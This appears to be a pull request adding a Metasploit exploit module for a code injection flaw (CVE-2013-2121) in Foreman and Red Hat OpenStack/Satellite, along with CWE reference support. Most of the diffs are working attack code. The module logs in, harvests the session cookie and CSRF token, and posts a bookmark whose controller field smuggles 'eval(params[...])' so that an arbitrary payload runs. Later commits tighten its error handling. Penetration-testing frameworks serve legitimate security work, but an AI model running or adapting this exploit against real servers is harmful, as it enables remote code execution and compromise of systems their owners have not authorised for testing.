### PR TITLE
Add foreman_openstack_satellite_code_exec.rb exploit module and support to CWE in module references

### DIFF
--- a/lib/msf/core/module/reference.rb
+++ b/lib/msf/core/module/reference.rb
@@ -96,6 +96,8 @@ class Msf::Module::SiteReference < Msf::Module::Reference
 			self.site = 'http://www.osvdb.org/' + in_ctx_val.to_s
 		elsif (in_ctx_id == 'CVE')
 			self.site = "http://cvedetails.com/cve/#{in_ctx_val.to_s}/"
+		elsif (in_ctx_id == 'CWE')
+			self.site = "http://cwe.mitre.org/data/definitions/#{in_ctx_val.to_s}.html"
 		elsif (in_ctx_id == 'BID')
 			self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
 		elsif (in_ctx_id == 'MSB')

--- a/lib/msf/core/module/reference.rb
+++ b/lib/msf/core/module/reference.rb
@@ -96,8 +96,6 @@ class Msf::Module::SiteReference < Msf::Module::Reference
 			self.site = 'http://www.osvdb.org/' + in_ctx_val.to_s
 		elsif (in_ctx_id == 'CVE')
 			self.site = "http://cvedetails.com/cve/#{in_ctx_val.to_s}/"
-		elsif (in_ctx_id == 'CWE')
-			self.site = "http://cwe.mitre.org/data/definitions/#{in_ctx_val.to_s}.html"
 		elsif (in_ctx_id == 'BID')
 			self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
 		elsif (in_ctx_id == 'MSB')

--- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
+++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
@@ -103,8 +103,6 @@ class Metasploit4 < Msf::Exploit::Remote
 				'bookmark[query]'      => Rex::Text.rand_text_alpha_lower(rand(9) + 3)
 			}
 		)
-
-		handler
 	end
 
 	def target_url(*args)

--- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
+++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
@@ -83,8 +83,14 @@ class Metasploit4 < Msf::Exploit::Remote
 		if res.headers['Location'] =~ /users\/login$/
 			fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')
 		else
-			csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]+\/?>/
-			csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]+\/?>/
+			csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i
+			csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i
+
+			if csrf_param.nil? || csrf_token.nil?
+				csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i
+				csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i
+			end
+
 			fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?
 		end
 

--- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
+++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
@@ -72,6 +72,11 @@ class Metasploit4 < Msf::Exploit::Remote
 			return
 		else
 			session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
+
+			if session.nil?
+				print_error('Failed to retrieve the current session id')
+				return
+			end
 		end
 
 		print_status('Retrieving the CSRF token for this session...')
@@ -92,6 +97,11 @@ class Metasploit4 < Msf::Exploit::Remote
 		else
 			csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]+\/?>/
 			csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]+\/?>/
+
+			if csrf_param.nil? || csrf_token.nil?
+				print_error('Failed to retrieve the CSRF token')
+				return
+			end
 		end
 
 		payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)

--- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
+++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
@@ -1,0 +1,124 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize
+		super(
+			'Name'           => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',
+			'Description'    => %q{
+					This module exploits a code injection vulnerability in the 'create'
+				action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite
+				(Foreman 1.2.0-RC1 and earlier).
+			},
+			'Author'         => 'Ramon de C Valle',
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					['CVE', '2013-2121'],
+					['CWE', '95'],
+					['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],
+					['URL', 'http://projects.theforeman.org/issues/2631']
+				],
+			'Platform'       => 'ruby',
+			'Arch'           => ARCH_RUBY,
+			'Privileged'     => false,
+			'Targets'        =>
+				[
+					['Automatic', {}]
+				],
+			'DisclosureDate' => 'Jun 6 2013',
+			'DefaultOptions' => { 'PrependFork' => true },
+			'DefaultTarget' => 0
+		)
+
+		register_options(
+			[
+				Opt::RPORT(443),
+				OptBool.new('SSL', [true, 'Use SSL', true]),
+				OptString.new('MYUSERNAME', [true, 'Your username']),
+				OptString.new('MYPASSWORD', [true, 'Your password']),
+				OptString.new('URIPATH', [ true, 'The path to the application', '/']),
+			], self.class
+		)
+	end
+
+	def exploit
+		print_status("Logging into #{target_url}...")
+		res = send_request_cgi(
+			'method'    => 'POST',
+			'uri'       => normalize_uri(target_uri.path, 'users', 'login'),
+			'vars_post' => {
+				'login[login]'    => datastore['MYUSERNAME'],
+				'login[password]' => datastore['MYPASSWORD']
+			}
+		)
+
+		if res.nil?
+			print_error('No response from remote host')
+			return
+		end
+
+		if res.headers['Location'] =~ /users\/login$/
+			print_error('Authentication failed')
+			return
+		else
+			session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
+		end
+
+		print_status('Retrieving the CSRF token for this session...')
+		res = send_request_cgi(
+			'cookie' => "_session_id=#{session}",
+			'method' => 'GET',
+			'uri'    => normalize_uri(target_uri)
+		)
+
+		if res.nil?
+			print_error('No response from remote host')
+			return
+		end
+
+		if res.headers['Location'] =~ /users\/login$/
+			print_error('Failed to retrieve the CSRF token')
+			return
+		else
+			csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]+\/?>/
+			csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]+\/?>/
+		end
+
+		payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)
+
+		print_status("Sending create-bookmark request to #{target_url('bookmarks')}...")
+		res = send_request_cgi(
+			'cookie'    => "_session_id=#{session}",
+			'method'    => 'POST',
+			'uri'       => normalize_uri(target_uri.path, 'bookmarks'),
+			'vars_post' => {
+				csrf_param             => csrf_token,
+				payload_param          => payload.encoded,
+				'bookmark[controller]' => "eval(params[:#{payload_param}])#",
+				'bookmark[name]'       => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
+				'bookmark[query]'      => Rex::Text.rand_text_alpha_lower(rand(9) + 3)
+			}
+		)
+
+		handler
+	end
+
+	def target_url(*args)
+		(ssl ? 'https' : 'http') +
+			if rport.to_i == 80 || rport.to_i == 443
+				"://#{vhost}"
+			else
+				"://#{vhost}:#{rport}"
+			end + normalize_uri(target_uri.path, *args)
+	end
+end

--- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
+++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
@@ -62,21 +62,13 @@ class Metasploit4 < Msf::Exploit::Remote
 			}
 		)
 
-		if res.nil?
-			print_error('No response from remote host')
-			return
-		end
+		fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?
 
 		if res.headers['Location'] =~ /users\/login$/
-			print_error('Authentication failed')
-			return
+			fail_with(Exploit::Failure::NoAccess, 'Authentication failed')
 		else
 			session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
-
-			if session.nil?
-				print_error('Failed to retrieve the current session id')
-				return
-			end
+			fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?
 		end
 
 		print_status('Retrieving the CSRF token for this session...')
@@ -86,22 +78,14 @@ class Metasploit4 < Msf::Exploit::Remote
 			'uri'    => normalize_uri(target_uri)
 		)
 
-		if res.nil?
-			print_error('No response from remote host')
-			return
-		end
+		fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?
 
 		if res.headers['Location'] =~ /users\/login$/
-			print_error('Failed to retrieve the CSRF token')
-			return
+			fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')
 		else
 			csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]+\/?>/
 			csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]+\/?>/
-
-			if csrf_param.nil? || csrf_token.nil?
-				print_error('Failed to retrieve the CSRF token')
-				return
-			end
+			fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?
 		end
 
 		payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)

--- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
+++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
@@ -46,7 +46,7 @@ class Metasploit4 < Msf::Exploit::Remote
 				OptBool.new('SSL', [true, 'Use SSL', true]),
 				OptString.new('MYUSERNAME', [true, 'Your username']),
 				OptString.new('MYPASSWORD', [true, 'Your password']),
-				OptString.new('URIPATH', [ true, 'The path to the application', '/']),
+				OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
 			], self.class
 		)
 	end


### PR DESCRIPTION
This adds an exploit module for a code injection vulnerability in Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier), and support to CWE in module references.
